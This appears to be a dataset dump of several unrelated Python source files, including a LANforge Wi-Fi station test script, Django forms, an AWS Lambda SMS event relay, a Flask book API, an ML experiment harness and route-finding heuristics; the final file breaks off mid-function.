content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python3
import sys
import os
if sys.version_info[0] != 3:
print("This script requires Python 3")
exit(1)
if 'py-json' not in sys.path:
sys.path.append(os.path.join(os.path.abspath('..'), 'py-json'))
import argparse
import LANforge
from LANforge.lfcli_base import LFCliBase
from LANforge import LFUtils
import realm
import time
import pprint
class IPv4Test(LFCliBase):
def __init__(self, host, port, ssid, security, password, sta_list=None, number_template="00000", radio ="wiphy0", _debug_on=False,
_exit_on_error=False,
_exit_on_fail=False):
super().__init__(host, port, _debug=_debug_on, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
self.host = host
self.port = port
self.ssid = ssid
self.radio= radio
self.security = security
self.password = password
self.sta_list = sta_list
self.timeout = 120
self.number_template = number_template
self.debug = _debug_on
self.local_realm = realm.Realm(lfclient_host=self.host, lfclient_port=self.port)
self.station_profile = self.local_realm.new_station_profile()
self.station_profile.lfclient_url = self.lfclient_url
self.station_profile.ssid = self.ssid
self.station_profile.ssid_pass = self.password,
self.station_profile.security = self.security
self.station_profile.number_template_ = self.number_template
self.station_profile.mode = 0
def build(self):
# Build stations
self.station_profile.use_security(self.security, self.ssid, self.password)
self.station_profile.set_number_template(self.number_template)
print("Creating stations")
self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
self.station_profile.set_command_param("set_port", "report_timer", 1500)
self.station_profile.set_command_flag("set_port", "rpt_timer", 1)
self.station_profile.create(radio=self.radio, sta_names_=self.sta_list, debug=self.debug)
self.station_profile.admin_up()
self._pass("PASS: Station build finished")
def cleanup(self, sta_list):
self.station_profile.cleanup(sta_list)
LFUtils.wait_until_ports_disappear(base_url=self.lfclient_url, port_list=sta_list,
debug=self.debug)
def main():
lfjson_host = "localhost"
lfjson_port = 8080
parser = LFCliBase.create_basic_argparse(
prog='example_wpa_connection.py',
# formatter_class=argparse.RawDescriptionHelpFormatter,
formatter_class=argparse.RawTextHelpFormatter,
epilog='''\
Example code that creates a specified amount of stations on a specified SSID using WPA security.
''',
description='''\
example_wpa_connection.py
--------------------
Generic command example:
python3 ./example_wpa_connection.py \\
--host localhost (optional) \\
--port 8080 (optional) \\
--num_stations 3 \\
--security {open|wep|wpa|wpa2|wpa3} \\
--ssid netgear-wpa \\
--passwd admin123-wpa \\
--debug
Note: multiple --radio switches may be entered up to the number of radios available:
--radio wiphy0 <stations> <ssid> <ssid password> --radio <radio 01> <number of last station> <ssid> <ssid password>
''')
parser.add_argument('--test_duration', help='--test_duration sets the duration of the test', default="5m")
parser.add_argument('--url', help='--url specifies upload/download, address, and dest', default="dl http://10.40.0.1 /dev/null")
args = parser.parse_args()
num_sta = 2
if (args.num_stations is not None) and (int(args.num_stations) > 0):
num_stations_converted = int(args.num_stations)
num_sta = num_stations_converted
station_list = LFUtils.portNameSeries(prefix_="sta",
start_id_=0,
end_id_=num_sta-1,
padding_number_=10000,
radio=args.radio)
ip_test = IPv4Test(lfjson_host, lfjson_port, ssid=args.ssid, password=args.passwd, radio=args.radio,
security=args.security, sta_list=station_list)
# ip_test = IPv4Test(lfjson_host, lfjson_port, ssid="jedway-wpa-1", password="jedway-wpa-1",
#security="wpa", sta_list=station_list)
ip_test.cleanup(station_list)
ip_test.timeout = 60
ip_test.build()
if __name__ == "__main__":
main()
|
# Copyright 2018 Eddie Schoute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Quippy is a parser library for parsing Quipper ASCII quantum circuit descriptions."""
from quippy.parser import quipper_parser as parser
from quippy.transformer import Wire, Control, TypeAssignment_Type, TypeAssignment, Gate, QGate_Op, \
QGate, QRot_Op, QRot, QInit, CInit, QTerm, CTerm, QMeas, QDiscard, CDiscard, SubroutineCall, \
Comment, Circuit, Subroutine_Control, Subroutine, Start
__all__ = [parser, Wire, Control, TypeAssignment_Type, TypeAssignment, Gate, QGate_Op, QGate,
QRot_Op, QRot, QInit, CInit, QTerm, CTerm, QMeas, QDiscard, CDiscard, SubroutineCall,
Comment, Circuit, Subroutine_Control, Subroutine, Start]
|
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
"""
Creates the system platform package.
"""
from __future__ import absolute_import
from rez.package_maker import make_package
from rez.vendor.version.version import Version
from rez.bind._utils import check_version
from rez.system import system
def bind(path, version_range=None, opts=None, parser=None):
version = Version(system.platform)
check_version(version, version_range)
with make_package("platform", path) as pkg:
pkg.version = version
return pkg.installed_variants
|
from django.forms import ModelForm
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile, Project, Rating
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class ProfileForm(ModelForm):
class Meta:
model = Profile
field = '__all__'
exclude = ['user']
class NewProjectForm(ModelForm):
class Meta:
model = Project
exclude = ['user']
class NewRatingForm(ModelForm):
class Meta:
model = Rating
exclude = ['user','project'] |
"""
Copyright © 2021, SAS Institute Inc., Cary, NC, USA. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import os
import json
import urllib3
import boto3
from botocore.exceptions import ClientError
print("Initializing function")
# Get the service resource
dynamodb = boto3.resource('dynamodb')
# Initialize global variables
db_cache_identities_table = os.environ['db_cache_identities_table']
scg_mo_event = os.environ["scg_mo_event"]
sm_secret_id_prefix = os.environ['sm_secret_id_prefix']
scg_mo_body_uppercase = os.environ["scg_mo_body_uppercase"].lower() == 'true'
identity_field = os.environ['identity_field']
default_tenant_id = os.environ['tenant_id']
secret_cache = {}
"""
lambda_handler:
Main event handler entry point for lamdba request
"""
def lambda_handler(event, context):
if event is not None and event["body"] is not None:
event_body = json.loads(event["body"])
#print(event_body)
event_type = event_body["event"]["evt-tp"]
print("event_type:", event_type)
# check if MO message or status update
if event_type == "mo_message_received":
process_mo_message(event_body)
else:
process_status_message(event_body)
else:
print('no event body')
return {
'statusCode': 200,
'body': json.dumps('OK')
}
"""
process_mo_message:
Inbound (MO) message processing logic
"""
def process_mo_message(event_body):
fld_list = event_body["event"]["fld-val-list"]
# parse out required values
#msg_id = fld_list["message_id"]
#to_address = fld_list["to_address"]
from_address = fld_list["from_address"]
msg_body = fld_list["message_body"]
# check if message_body is JSON for RCS reply
try:
msg_json = json.loads(msg_body)
except ValueError as e:
print("simple message body - not JSON")
# uppercase message body if configured
if scg_mo_body_uppercase:
msg_body = fld_list["message_body"].upper()
else:
print("JSON message body:", msg_json)
msg_body = msg_json["postbackData"]
# determine inbound channel (default = SMS)
channel = "SMS"
sender_id = fld_list["sender_id_id"]
# hardcoded sender_id for WhatsApp demo
if sender_id == "LhvA6oXM43cXBlFiozlmG4":
channel = "WhatsApp"
# get datahub_id and tenant from cache based on phone
datahub_id, tenant_id = get_cached_identity(from_address)
if tenant_id is None:
print("No tenant_id in cache, using default tenant_id:", default_tenant_id)
tenant_id = default_tenant_id
print("datahub_id:", datahub_id, "tenant_id:", tenant_id)
if identity_field.strip() == "":
if datahub_id is not None:
msg_data = { "eventName": scg_mo_event, "datahub_id": datahub_id, "message_body": msg_body }
call_ci360_api(msg_data, tenant_id)
else:
print("no cached identity found and no identity field")
else:
msg_data = { "eventName": scg_mo_event, identity_field: from_address, "message_body": msg_body }
call_ci360_api(msg_data, tenant_id)
"""
process_status_message:
Message status update processing logic
"""
def process_status_message(event_body):
msg_data = {}
fld_list = event_body["event"]["fld-val-list"]
# parse out required values
msg_id = fld_list["message_id"]
to_address = fld_list["to_address"]
from_address = fld_list["from_address"]
new_state = fld_list["new_state"]
print("msg_id:", msg_id, "new_state:", new_state)
# parse out external message id
ext_msg_id = fld_list["external_message_request_id"]
id_parts = ext_msg_id.split("|")
tenant_id = None
if len(id_parts) >= 2:
msg_data["datahub_id"] = id_parts[0]
msg_data["externalCode"] = id_parts[1]
if len(id_parts) >= 3:
tenant_id = id_parts[2]
if tenant_id is None:
print("No tenant_id in external_id, using default tenant_id:", default_tenant_id)
tenant_id = default_tenant_id
# translate new_state to external 360 event
try:
msg_data["eventName"] = os.environ["scg_response_event_" + new_state]
call_ci360_api(msg_data, tenant_id)
except KeyError as e:
print("No event defined for state", new_state)
"""
call_ci360_api:
Method calls CI360 Event API to inject external event
"""
def call_ci360_api(msg_data, tenant_id):
secret = get_secret(tenant_id)
if secret is not None:
# call api
print("CI360 event msg_data:", msg_data)
encoded_data = json.dumps(msg_data).encode('utf-8')
req_headers = { "Authorization": "Bearer " + secret['ci360_token'], 'Content-Type': 'application/json' }
http = urllib3.PoolManager()
r = http.request('POST', secret['ci360_api_url'], body = encoded_data, headers = req_headers)
print("Response Status:", r.status, "Body:", r.data)
else:
print("Could not get secret (API keys)")
"""
get_cached_identity:
Retrieve identity from cache (DynamoDB table) based on message recipient/sender
"""
def get_cached_identity(from_addr):
print("Reading identity data from cache")
# read data from cache
table = dynamodb.Table(db_cache_identities_table)
try:
db_item = table.get_item(Key={'phone': from_addr})
except ClientError as e:
print(e.response['Error']['Message'])
return None
else:
#print(response)
datahub_id = None
tenant_id = None
try:
datahub_id = db_item['Item']['datahub_id']
tenant_id = db_item['Item']['tenant_id']
except KeyError:
print("no item returned from cache")
return datahub_id, tenant_id
"""
get_secret
Retrieve Secret from cache or SecretsManager containing API tokens
"""
def get_secret(tenant_id):
try:
secret = secret_cache[tenant_id]
print("secret found in cache")
#print("secret:", secret)
except KeyError:
print(f"secret not found in cache, fetching for tenant: {tenant_id}")
secret = fetch_secret(tenant_id)
secret_cache[tenant_id] = secret
return secret
"""
get_secret
Retrieve Secret from SecretsManager containing API tokens (used when secret not found in cache)
"""
def fetch_secret(tenant_id):
# Get secrets
session = boto3.session.Session()
client = session.client(service_name='secretsmanager', region_name="us-east-1")
try:
secret_id = sm_secret_id_prefix + tenant_id
get_secret_value_response = client.get_secret_value(SecretId=secret_id)
except ClientError as e:
print("Failed to get secrets: ", e.response)
#raise e
else:
if 'SecretString' in get_secret_value_response:
secret = json.loads(get_secret_value_response['SecretString'])
#print(secret)
return secret
else:
print("No SecretString found")
return None
|
#!/usr/bin/python3
# -*- encoding=utf8 -*-
from uuid import uuid4
import flask
from flask import Flask
from flask import request
from flask import abort
from flask_basicauth import BasicAuth
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = 'test_user'
app.config['BASIC_AUTH_PASSWORD'] = 'test_password'
basic_auth = BasicAuth(app)
BOOKS = []
SESSIONS = []
class InvalidUsage(Exception):
status_code = 400
def verify_cookie(req):
""" This function verifies cookie. """
cookie = req.cookies.get('my_cookie', '')
return cookie in SESSIONS
@app.route('/login', methods=['GET'])
@basic_auth.required
def get_auth():
""" This function verifies user and password and creates
new cookie if user and password are correct.
"""
cookie = str(uuid4())
SESSIONS.append(cookie)
return flask.jsonify({'auth_cookie': cookie})
@app.route('/books', methods=['GET'])
def get_list_of_books():
""" This function returns the list of books. """
global BOOKS
if verify_cookie(request):
sort_filter = request.args.get('sort', '')
list_limit = int(request.args.get('limit', -1))
result = BOOKS
if sort_filter == 'by_title':
result = sorted(result, key=lambda x: x['title'])
if list_limit > 0:
result = result[:list_limit]
return flask.jsonify(BOOKS)
raise InvalidUsage('No valid auth cookie provided!')
@app.route('/books/<book_id>', methods=['GET'])
def get_book(book_id):
""" This function returns one book from the list. """
if verify_cookie(request):
result = {}
for book in BOOKS:
if book['id'] == book_id:
result = book
return flask.jsonify(result)
raise InvalidUsage('No valid auth cookie provided!')
@app.route('/books/<book_id>', methods=['PUT'])
def update_book(book_id):
""" This function updates information about some book. """
if verify_cookie(request):
for i, book in enumerate(BOOKS):
# Find the book with this ID:
if book['id'] == book_id:
book['title'] = request.values.get('title', book['title'])
book['author'] = request.values.get('author', book['author'])
# Update information about this book:
BOOKS[i] = book
return flask.jsonify(book)
abort(404)
raise InvalidUsage('No valid auth cookie provided!')
@app.route('/books/<book_id>', methods=['DELETE'])
def delete_book(book_id):
""" This function deletes book from the list. """
global BOOKS
if verify_cookie(request):
# Create new list of book and skip one book
# with specified id:
new_books = [b for b in BOOKS if b['id'] != book_id]
BOOKS = new_books
return flask.jsonify({'deleted': book_id})
raise InvalidUsage('No valid auth cookie provided!')
@app.route('/add_book', methods=['POST'])
def add_book():
""" This function adds new book to the list. """
global BOOKS
if verify_cookie(request):
book_id = str(uuid4())
title = request.values.get('title', '')
author = request.values.get('author', 'No Name')
new_book = {'id': book_id, 'title': title, 'author': author}
# add new book to the list:
BOOKS.append(new_book)
return flask.jsonify(new_book)
raise InvalidUsage('No valid auth cookie provided!')
if __name__ == "__main__":
app.run('0.0.0.0', port=7000) |
"""Abstract descriptions of a network analyzer.
"""
import base64
import csv
import io
import os
import pickle
import shutil
import tarfile
import numpy as np
from PIL import Image
import imageio
from pysyrenn import Network
from syrenn_proto import syrenn_pb2 as syrenn_pb
class Experiment:
"""Abstract class describing a network experiment.
"""
def __init__(self, directory_name):
"""Initializes a new experiment.
Creates an output directory, removing any existing files in that
location. Also initializes a new artifacts_csv file which holds a list
of all the artifacts written to using the "record_artifact" interface.
"""
# Create a directory outside of bazel-bin for storing the results.
global_dir = os.environ["BUILD_WORKING_DIRECTORY"]
self.directory = "{}/experiments/results/{}".format(
global_dir, directory_name)
shutil.rmtree(self.directory, ignore_errors=True)
os.makedirs(self.directory, exist_ok=True)
self.tar_name = "%s.exp.tgz" % self.directory
self.open_files = []
self.artifacts = None
self.artifacts_csv = self.begin_csv("artifacts", ["key", "type", "path"])
def close(self, tar=True, nicely=True):
"""Ends the experiment, freeing open file pointers.
@tar determines whether the experiment directory should be tarred into
an archive. In general, this is done after the initial experiments and
then once more if the analysis produces any new files.
@nicely should indicate whether the closing is expected or not. For
example, if the program errors in the middle of an experiment, it is
not "nice." nicely=False will leave the experiment directory alone
(i.e. untarred and unremoved).
"""
for open_file in self.open_files:
open_file.close()
self.open_files = []
if tar and nicely:
# tar directory into directory.exp.tar
with tarfile.open(self.tar_name, "w:gz") as archive:
for name in os.listdir(self.directory):
archive.add("%s/%s" % (self.directory, name), arcname=name)
if nicely:
shutil.rmtree(self.directory, ignore_errors=True)
def open(self):
"""Reads experiment data from a previous run.
In general, this is called after run() and close(), or when doing an
analyze-only execution of previous experimental results.
"""
# Create the extraction directory.
shutil.rmtree(self.directory, ignore_errors=True)
os.mkdir(self.directory)
# Extract the tar file.
with tarfile.open(self.tar_name, "r:*") as archive:
archive.extractall(self.directory)
self.artifacts = self.read_csv("artifacts")
# Re-open and re-fill the CSV file so we can keep writing to it.
self.artifacts_csv = self.begin_csv("artifacts", ["key", "type", "path"])
# TODO(masotoud): look into a way to open the file for appending.
# instead of truncating + re-adding.
for artifact in self.artifacts:
self.write_csv(self.artifacts_csv, artifact)
def has_archive(self):
"""True if the experiment seems to have already been run.
"""
return os.path.exists(self.tar_name)
def remove_archive(self):
"""Removes an existing archive.
"""
return os.remove(self.tar_name)
def __del__(self):
"""Close file handles in case of unexpected exit.
Normal exits should call .close(nicely=True).
"""
self.close(nicely=False)
@staticmethod
def image_to_datauri(image):
"""Converts a Numpy array holding an image to a data representation.
Useful for embedding images in SVG files. See:
https://stackoverflow.com/questions/46598607
"""
image = Image.fromarray(image.astype("uint8"))
raw_bytes = io.BytesIO()
image.save(raw_bytes, "PNG")
raw_bytes.seek(0)
image = base64.b64encode(raw_bytes.read()).decode()
return "data:image/png;base64,{}".format(image)
@staticmethod
def load_network(network_name, maxify_acas=True):
"""Loads an experiment network given by @network_name.
Currently supports models of the form:
- acas_#_# (ACAS Xu models translated from the ReluPlex format)
- {cifar10,mnist}_relu_#_# (fully-connected ReLU models from ERAN)
- {cifar10,mnist}_relu_conv{small,medium,big}{_diffai,_pgd}
(convolutional ReLU models from ERAN).
And should be referenced in BUILD rule experiments:models.
maxify_acas controlls whether the ACAS model is "cleaned" before
returned; cleaning removes the unnecessary ReLU layer at the end as
well as inverts the outputs so the recommended action becomes the
maximal score.
"""
if "acas_" in network_name:
_, i, j = network_name.split("_")
network = Network.from_file("models/acas_models/%s_%s.eran"
% (i, j))
if maxify_acas:
# We remove ReLU layers from the end of the model as they don't
# actually change the classification (when one exists).
assert not hasattr(network.layers[:-1], "weights")
network.layers = network.layers[:-1]
# ACAS Xu networks use the minimal score as the class instead
# of the more-standard maximum score; this inverts the last
# layer so the minimal score becomes the max.
network.layers[-1].weights *= -1.0
network.layers[-1].biases *= -1.0
return network
if "vrl_" in network_name:
_, model_name = network_name.split("_", 1)
return Network.from_file("models/vrl/eran/%s.eran" % model_name)
return Network.from_file(
"external/%s_model/file/model.eran" % (network_name))
@staticmethod
def load_input_data(name_or_path, is_eran_conv_model=False):
"""Gets a dataset and/or its metadata.
Currently supports three datasets:
- acas (empty dataset which returns preprocessing info for ACAS)
- cifar10_test (100 test images from ERAN)
- mnist_test (100 test images from ERAN)
Returns a dictionary with four items:
- process(np_array) will process a raw (uint8) Numpy array image into a
format that can be passed to the Network.
- reset(np_array) will invert process(...). This may not always be
possible if process(...) is non-invertible, but it should at least
work on all valid images (i.e., uint8 pixel values).
- raw_inputs holds (flattened) uint8 Numpy arrays for each input image.
- labels holds the corresponding label for each input image.
"""
if name_or_path == "acas":
mins = np.array([0.0, -3.141593, -3.141593, 100.0, 0.0])
maxes = np.array([60760.0, 3.141593, 3.141593, 1200.0, 1200.0])
means = np.array([1.9791091e+04, 0.0, 0.0, 650.0, 600.0])
std_deviations = np.array([60261.0, 6.28318530718, 6.28318530718,
1100.0, 1200.0])
return {
"process": lambda i: ((np.clip(i, mins, maxes) - means) / std_deviations),
"reset": lambda i: ((i * std_deviations) + means),
"raw_inputs": [],
"labels": [],
}
inputs_file_path = "external/%s_data/file/data.csv" % name_or_path
# ERAN models
with open(inputs_file_path, "r", newline="") as inputs_file:
csv_inputs = csv.reader(inputs_file)
input_data = np.array(list(csv_inputs)).astype(np.float64)
# TODO(masotoud): handle this more robustly.
process_input = lambda i: i / 255.0
reset_input = lambda i: np.round(i * 255.0)
if "cifar10" in name_or_path and not is_eran_conv_model:
# The "conv" ERAN models correspond to .pyt files, which are
# normalized *in the model itself* (see:
# https://github.com/eth-sri/eran/blob/df4d1cf4556c0ad4ba062cbfda9a645449f8096e/tf_verify/__main__.py
# line 254 and 263 -- the normalize() call for Pytorch models
# corresponds to a NormalizeLayer that we pass to the transformer
# server)
process_input = lambda i: (i / 255.0) - 0.5
reset_input = lambda i: np.round((i + 0.5) * 255.0)
return {
"process": process_input,
"reset": reset_input,
"raw_inputs": input_data[:, 1:],
"labels": input_data[:, 0].astype(np.int),
}
@staticmethod
def rgbify_image(image):
"""Converts a flattened uint8 image array into a HWC, RGB one.
This method *ASSUMES* the dataset is either CIFAR10 or MNIST.
"""
shape_to_use = (-1,)
if image.size == 28 * 28:
# We assume this is a B/W MNIST image
shape_to_use = (28, 28)
elif image.size == (32 * 32 * 3):
# We assume this is an RGB CIFAR10 32x32 image
shape_to_use = (32, 32, 3)
image = np.reshape(image, shape_to_use).astype(np.uint8)
if len(shape_to_use) == 2:
# https://stackoverflow.com/questions/32171917
image = np.repeat(image[:, :, np.newaxis], 3, axis=2)
return image
def begin_csv(self, filename, column_labels, extrasaction="raise"):
"""Opens a new CSV file with the given column labels for writing.
Returns a tuple (file_handle, csv_writer) that can be passed to
write_csv. These do not need to be manually flushed or closed --- that
is handled by Experiment.close() and Experiment.write_csv().
@filename should be a path-safe identifier for the CSV file (extension
and path not necessary).
@column_labels should be a list of (string) column labels. These will
correspond to dictionary keys in write_csv and read_csv.
"""
dirname = os.path.dirname(filename)
self.artifact_directory(dirname) # Ensure the directory exists
csv_file = open("%s/%s.csv" % (self.directory, filename), "w",
newline="")
csv_writer = csv.DictWriter(csv_file, column_labels,
extrasaction=extrasaction)
csv_writer.writeheader()
self.open_files.append(csv_file)
return (csv_file, csv_writer)
@staticmethod
def write_csv(csv_data, record):
"""Writes a record to a CSV file opened with Experiment.begin_csv(...).
@csv_data should be the tuple returned by Experiment.begin_csv(...)
@record should be a dictionary with keys corresponding to the
@column_labels passed to Experiment.begin_csv(...)
"""
csv_data[1].writerow(record)
csv_data[0].flush()
def read_csv(self, filename):
"""Fully reads a CSV file and returns a list of the rows.
Each row is represented by a dictionary with keys corresponding to the
columns. Dictionary values are strings --- parsing them to a usable
format is left to the caller.
"""
filename = "%s/%s.csv" % (self.directory, filename)
with open(filename, "r", newline="") as csv_file:
csv_reader = csv.DictReader(csv_file)
data = []
for record in csv_reader:
data.append(dict(record))
return data
def artifact_directory(self, dir_key):
"""Creates a directory that will be included in the experiment archive.
Returns its path without trailing /.
"""
name = "%s/%s" % (self.directory, dir_key)
os.makedirs(name, exist_ok=True)
return name
def record_artifact(self, artifact, key, artifact_type):
"""Record a high-level artifact from the experiment.
Each Experiment instance has a corresponding "artifact store" which
allows one to easily record, store, and later reference artifacts
produced during the experiment. This method adds an artifact @artifact
to that store, using key @key under the assumption that the artifact
should be treated as type @artifact_type.
"""
filename = "%s/%s" % (self.directory, key)
file_directory = os.path.dirname(filename)
if artifact_type != "rawpath" and not os.path.exists(file_directory):
# See notes on a possible race condition in the answer here:
# https://stackoverflow.com/questions/10149263
os.makedirs(file_directory)
def write_pb(path, pb_serialized):
"""Writes @pb_serialized to @path.
"""
with open(path, "wb") as to_file:
to_file.write(pb_serialized.SerializeToString())
if artifact_type == "rgb_image":
filename += ".png"
imageio.imwrite(filename, artifact)
elif artifact_type == "np_array":
filename += ".npy"
np.save(filename, artifact)
elif artifact_type == "pickle":
filename += ".pickle"
with open(filename, "wb") as to_file:
pickle.dump(artifact, to_file)
elif artifact_type == "matplotlib":
filename += ".pdf"
artifact.savefig(filename)
elif artifact_type in "network":
filename += ".pb"
write_pb(filename, artifact.serialize())
elif artifact_type == "svg":
filename += ".svg"
artifact.saveas(filename)
elif artifact_type == "rawpath":
filename = artifact
elif artifact_type == "csv":
filename = artifact
elif artifact_type == "text":
with open(filename, "w") as to_file:
to_file.write(artifact)
else:
raise NotImplementedError
record = {"key": key, "type": artifact_type, "path": filename}
self.write_csv(self.artifacts_csv, record)
if self.artifacts is not None:
self.artifacts.append(record)
def read_artifact(self, key):
"""Reads an artifact from the loaded artifact store indexed by @key.
Experiment.open() *MUST* be called before using read_artifact(...).
This method is intended to be used only by the analyze() method (not
run, which should be calling record_artifact).
"""
assert self.artifacts is not None
try:
artifact = next(artifact for artifact in self.artifacts
if artifact["key"] == key)
except StopIteration:
raise KeyError
def read_pb(path, pb_type):
"""Deserializes protobuf data stored to a file.
@path is the file path, @pb_type is the Protobuf descriptor to
parse as.
"""
with open(path, "rb") as from_file:
string_rep = from_file.read()
serialized = pb_type()
serialized.ParseFromString(string_rep)
return serialized
if artifact["type"] == "rgb_image":
return imageio.imread(artifact["path"])
if artifact["type"] == "np_array":
return np.load(artifact["path"], allow_pickle=True)
if artifact["type"] == "pickle":
with open(artifact["path"], "rb") as from_file:
return pickle.load(from_file)
if artifact["type"] == "rawpath":
return artifact["path"]
if artifact["type"] == "csv":
return self.read_csv(artifact["path"])
if artifact["type"] == "network":
return Network.deserialize(
read_pb(artifact["path"], syrenn_pb.Network))
raise NotImplementedError
@staticmethod
def summarize(data):
"""Returns a string summarizing the contents of @data.
@data should be a one-dimensional Numpy array.
"""
return "Mean: %lf, Std: %lf, Mdn: %lf, 25%%: %lf, 75%%: %lf" % (
np.mean(data),
np.std(data),
np.median(data),
np.percentile(data, 25.0),
np.percentile(data, 75.0))
def run(self):
"""Runs the analysis on the network and inputs.
"""
raise NotImplementedError
def analyze(self):
"""Performs analysis and summarization after a run().
Experiment.read_artifact(key) should be used to recover data from the
experiment.
"""
raise NotImplementedError
def main(self):
"""Main experiment harness.
"""
run = not self.has_archive()
if not run:
print("It seems that this experiment has already been run.")
choice = input("[R]e-run, [A]nalyze-only, or [D]elete and re-run? ").lower()[0]
assert choice in {"r", "a", "d"}
if choice == "d":
self.remove_archive()
run = choice in {"r", "d"}
if run:
self.run()
self.close()
self.open()
did_modify = self.analyze()
self.close(tar=did_modify)
|
import numpy as np
from time import time
from helpers.simulator.sim_bots import *
import math
import os
import matplotlib.pyplot as plt
class MarketGenerator(object):
def __init__(self):
self.market_path = "helpers/simulator/market_sim"
self.s0 = None
self.miu = None
self.sigma = None
self.tick_num = None
def set_prams(self, s0, mean, sigma, tick_num):
if s0 is not None: self.s0 = s0
if mean is not None: self.mean = mean
if sigma is not None: self.sigma = sigma
if tick_num is not None: self.tick_num = tick_num
def generate(self):
dt = 1.0 / self.tick_num
s1 = self.s0 * np.exp(self.mean * dt +
self.sigma * np.sqrt(dt) *
np.random.standard_normal(10000))
return s1
def show_market(self):
dt = 1.0 / self.tick_num
m = 10 # target num
s = np.zeros((self.tick_num+1, m))
s[0] = self.s0
for t in range(1, self.tick_num+1):
s[t] = s[t-1]* np.exp(self.mean * dt +
self.sigma * np.sqrt(dt) *
np.random.standard_normal(m))
plt.plot(s[:,:], lw=1.5)
plt.xlabel('time')
plt.ylabel('price')
plt.title('market simulation')
plt.show()
def simulate():
app = MarketGenerator()
app.set_prams(s0=3100, mean=0, sigma=0.3, tick_num=300)
app.show_market()
exit()
bot_manager = BotManager()
# 交易对,价差模式:等差/等比,价差数额,最大订单数,每格金额
# bot_manager.add_grid_bot(symbol='BNBBUSD', price_mode='geometric', price_diff=0.01, max_order=40, fund_each=20)
bot_manager.add_balance_bot(asset='AVAX', symbol='AVAXBUSD', multiple=0.35, diff=11)
bot_manager.run_init()
last_err_time = 0.0
re_err_cnt = 0
|
from .authenticators import authenticator
class DBUser(object):
def __init__(self, db, username, name, email, flags=""):
self.Username = username
self.Name = name
self.EMail = email
self.Flags = flags
self.DB = db
self.AuthInfo = {} # type -> [secret,...] # DB representation
self.RoleNames = None
def __str__(self):
return "DBUser(%s, %s, %s, %s)" % (self.Username, self.Name, self.EMail, self.Flags)
__repr__ = __str__
def save(self, do_commit=True):
c = self.DB.cursor()
auth_info = json.dumps(self.AuthInfo)
c.execute("""
insert into users(username, name, email, flags, auth_info) values(%s, %s, %s, %s, %s)
on conflict(username)
do update set name=%s, email=%s, flags=%s, auth_info=%s;
""",
(self.Username, self.Name, self.EMail, self.Flags, auth_info,
self.Name, self.EMail, self.Flags, auth_info
))
if do_commit:
c.execute("commit")
return self
def authenticate(self, method, config, presented):
a = authenticator(method, config, self.AuthInfo.get(method))
return a is not None and a.enabled() and a.authenticate(self.Username, presented)
def set_auth_info(self, method, info):
# info is in DB representation, e.g. unhashed password
self.AuthInfo[method] = info
def set_password(self, password):
# for compatibility, password is DB representation, e.g. hashed
self.set_auth_info("password", password)
def auth_info(self, method):
return self.AuthInfo.get(method)
def auth_method_enabled(self, method, config):
a = authenticator(method, config, self.AuthInfo.get(method))
return a is not None and a.enabled()
#return self.authenticator(method).enabled()
@staticmethod
def get(db, username):
c = db.cursor()
c.execute("""select u.name, u.email, u.flags, u.auth_info, array(select ur.role_name from users_roles ur where ur.username=u.username)
from users u
where u.username=%s""",
(username,))
tup = c.fetchone()
if not tup: return None
(name, email, flags, auth_info, roles) = tup
u = DBUser(db, username, name, email, flags)
u.AuthInfo = auth_info
u.RoleNames = roles
return u
def is_admin(self):
return "a" in (self.Flags or "")
@staticmethod
def list(db):
c = db.cursor()
c.execute("""select u.username, u.name, u.email, u.flags, array(select ur.role_name from users_roles ur where ur.username=u.username)
from users u
""")
for username, name, email, flags, roles in c.fetchall():
u = DBUser(db, username, name, email, flags)
u.RoleNames = roles
#print("DBUser.list: yielding:", u)
yield u
|
from Graph import *
from itertools import *
from time import *
## Hamilton path algorithms
def Brutal(G, latlong = True):
"""return the hamilton path and it's cost by comparing EVERY possibilities"""
n = len(G.nodes)
MinPath = G.nodes
MinCost = 0
for k in range (n-1):
MinCost += G.distNodes(G.nodes[k].ID, G.nodes[k+1].ID, latlong)
if (k == n-2):
MinCost += G.distNodes(G.nodes[k+1].ID, G.nodes[0].ID, latlong)
for path in list(permutations(G.nodes)):
cost = 0
k = 0
test = True
while (k<n-1) and (test):
cost += G.distNodes(path[k].ID, path[k+1].ID, latlong)
if (k == n-2):
cost += G.distNodes(path[k+1].ID, path[0].ID, latlong)
if (cost > MinCost):
test = False
k += 1
if (cost < MinCost):
MinCost = cost
MinPath = list(path)
return [MinCost, MinPath]
def Inser(G, latlong = True):
"""return an aproximated path that has been constructed by insertion of nodes"""
stack = G.nodes.copy()
shuffle(stack)
n = len(G.nodes)
if (n < 2):
return [0, G.nodes]
if (n == 2):
return [2 * G.distNodes(G.nodes[0].ID, G.nodes[1].ID, latlong), G.nodes]
path = [stack.pop(),stack.pop()]
while (stack):
node = stack.pop()
m = len(path)
indexInser = m
MinDetour = G.distNodes(path[-1].ID, node.ID, latlong) + G.distNodes(node.ID, path[0].ID, latlong) - G.distNodes(path[-1].ID, path[0].ID, latlong)
for k in range (m-1):
detour = G.distNodes(path[k].ID, node.ID, latlong) + G.distNodes(node.ID, path[k+1].ID, latlong) - G.distNodes(path[k].ID, path[k+1].ID, latlong)
if (detour < MinDetour):
MinDetour = detour
indexInser = k + 1
path.insert(indexInser,node)
cost = 0
for k in range (n-1):
cost += G.distNodes(path[k].ID, path[k+1].ID, latlong)
if (k == n-2):
cost += G.distNodes(path[k+1].ID, path[0].ID, latlong)
return [cost, path]
def Nearest(G, latlong = True):
"""return an aproximated path that has been constructed by adding the nearest neighbor at each step"""
list = G.nodes.copy()
shuffle(list)
n = len(G.nodes)
cost = 0
if (n < 2):
return [0, G.nodes]
if (n == 2):
